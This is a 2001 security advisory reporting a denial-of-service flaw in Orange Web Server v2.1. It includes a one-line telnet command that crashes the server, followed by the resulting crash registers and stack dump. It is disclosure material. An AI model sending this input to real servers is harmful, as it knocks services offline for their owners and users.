Introduction:
Orange Web Server v2.1 is a powerful yet light-
weight web server that runs on all Windows
platforms. Easy to setup and use, Orange Web
Server can turn any PC into a web server. The httpd
is based on GoAhead (c) Technology.
The Vendors website is:
http://www.orangesoftware.net/orangewebserver.html
Problem: Denial of Service Attack
Orange Web Server v2.1 is vulnerable to a very
simple Denial of Service attack where its possible to
cause the server to shut down at once and cause a
invalid page fault. This is a very strange DoS, see
example.
Examples:
echo "GET A" | telnet 192.168.0.20 80
^^ = That simple echo & pipe will cause this:
ORANGEWEBSERVER caused an invalid page fault
in module ORANGEWEBSERVER.EXE at
016f:00409694.
Registers:
EAX=49703d50 CS=016f EIP=00409694
EFLGS=00010246 EBX=009dfe84 SS=0177
ESP=009dfbb8 EBP=009dfe8c ECX=00000000
DS=0177 ESI=00416362 FS=84cf EDX=00000000
ES=0177 EDI=00000000 GS=0000 Bytes at CS:EIP:
f7 71 04 5e 8b c2 c3 90 90 90 90 90 56 8b 74 24
Stack dump:
00416350 004094a7 00000000 00416350 ffffffff
009dfbf0 009dfe8c 009dfe84 00418644 ffffffff
006d8e8c 00410b62 00000000 00416350 006d949c
00000000
Solution:
Vendor has been notified, and waiting for a reply.
--------------------
b10z HTTPd Advisory
[EMAIL PROTECTED]
Found: February 27th, 2001.
